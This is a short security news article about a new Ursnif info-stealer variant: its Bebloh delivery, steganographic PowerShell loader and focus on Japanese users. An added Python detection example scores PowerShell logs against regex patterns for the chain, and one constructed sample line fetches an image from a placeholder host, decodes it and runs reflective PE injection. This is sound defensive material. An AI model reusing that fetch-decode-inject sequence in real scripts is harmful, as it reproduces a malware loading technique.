Notorious info-stealing trojan Ursnif is back this year with a new variant. The latest variant packs a host of advanced features designed to evade early detection by security tools.
According to a detailed analysis by security firm Cybereason, Ursnif comes with enhanced stealing modules and an improved delivery method that relies on another trojan, Bebloh.
What are the techniques used - Like the earlier version, this variant uses steganography to hide malicious content, which PowerShell code then decrypts. The decrypted code is based on the PowerSploit framework and uses a Portable Executable (PE) loading module to load and execute Bebloh's payload.
Bebloh then drops Ursnif onto the system, which is fully compromised once Ursnif executes. Further technical details on the trojan can be found on the Cybereason blog.
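From the defender's side, the chain above leaves a recognisable sequence in PowerShell script-block logs: fetch an image, read its pixels, decode the hidden bytes, load a PE in memory. The following is an added example, not code from Cybereason or from the article, that scores constructed script-block records by how many of those stages they exhibit; the indicator patterns, the sample records, and the choice of PowerSploit's Invoke-ReflectivePEInjection as the loader being looked for are assumptions.

```python
import re
from dataclasses import dataclass, field

# Indicator groups, one per stage of the chain described above. These are
# assumed, typical script contents (not Ursnif IoCs from the analysis).
STAGES = {
    "image_fetch": re.compile(r"(Net\.WebClient|DownloadData|Invoke-WebRequest).{0,200}?\.(png|jpg|bmp)", re.I | re.S),
    "pixel_extract": re.compile(r"System\.Drawing\.Bitmap|\.GetPixel\(", re.I),
    "payload_decode": re.compile(r"FromBase64String|-bxor\b", re.I),
    "reflective_pe": re.compile(r"Invoke-ReflectivePEInjection|VirtualAlloc|GetProcAddress", re.I),
}

@dataclass
class Verdict:
    record_id: str
    stages: list = field(default_factory=list)

    @property
    def score(self):
        return len(self.stages)

def score_script_block(record_id, text):
    """Return which chain stages a single script block exhibits, in stage order."""
    hits = [name for name, rx in STAGES.items() if rx.search(text)]
    return Verdict(record_id, hits)

def triage(records, threshold=3):
    """Flag records hitting at least `threshold` distinct stages. A single stage
    (an admin script base64-decoding a config, a script resizing a photo) is
    routine; the combination across stages is what distinguishes the chain."""
    return [v for v in (score_script_block(i, t) for i, t in records) if v.score >= threshold]

# Constructed sample script-block records (Event ID 4104 style), not real malware.
SAMPLE_RECORDS = [
    ("4104-001", "$cfg = [Convert]::FromBase64String($env:APP_CFG); Set-Content cfg.json $cfg"),
    ("4104-002", "$img = New-Object System.Drawing.Bitmap('C:\\photos\\in.jpg'); $img.Save('out.png')"),
    ("4104-003", "$wc = New-Object Net.WebClient; $raw = $wc.DownloadData('http://example.invalid/i.png'); "
                 "$bmp = New-Object System.Drawing.Bitmap(...); $px = $bmp.GetPixel($x,$y); "
                 "$pe = [Convert]::FromBase64String($s); Invoke-ReflectivePEInjection -PEBytes $pe"),
]

if __name__ == "__main__":
    for v in triage(SAMPLE_RECORDS):
        print(v.record_id, v.stages)  # 4104-003 hits all four stages
```

Only the third record is flagged at the default threshold; the first two each hit one stage and are left alone.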
What are its capabilities and targets - Cybereason indicated that the variant matches another trojan with similar functionalities. “Based on our code analysis, the newly observed variant bears great resemblance to the Dreambot variant. However, it lacks some commonly observed built-in features like the Tor client and VNC module,” the researchers wrote.
Moreover, this variant was found to aggressively target Japanese users: features built specifically into it point to this, and telemetry also confirmed that its activity is concentrated in Japan.